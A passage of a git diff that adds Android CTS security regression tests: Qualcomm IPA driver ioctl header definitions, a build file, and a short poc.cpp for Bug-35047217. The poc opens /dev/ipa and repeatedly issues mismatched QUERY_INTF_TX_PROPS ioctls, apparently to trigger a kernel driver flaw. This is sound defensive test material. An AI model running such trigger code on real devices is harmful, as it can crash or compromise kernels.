+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp b/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp
new file mode 100644
index 0000000..34adca0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions
+ * and limitations under the License.
+ **/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_tx_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[2];
+};
+
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_tx_props_2 tx_props_2;
+ memset(&tx_props_2, 0, sizeof(tx_props_2));
+ strlcpy(&(tx_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ tx_props_2.num_tx_props = 2;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_TX_PROPS, &tx_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_tx_props tx_props;
+ memset(&tx_props, 0, sizeof(tx_props));
+ strlcpy(&(tx_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ tx_props.num_tx_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_TX_PROPS, &tx_props);
+
+ usleep(10000);
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/Android.mk b/hostsidetests/security/securityPatch/Bug-35047780/Android.mk
new file mode 100644
index 0000000..d4c91bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35047780
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h b/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h
new file mode 100644
index 0000000..106681c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
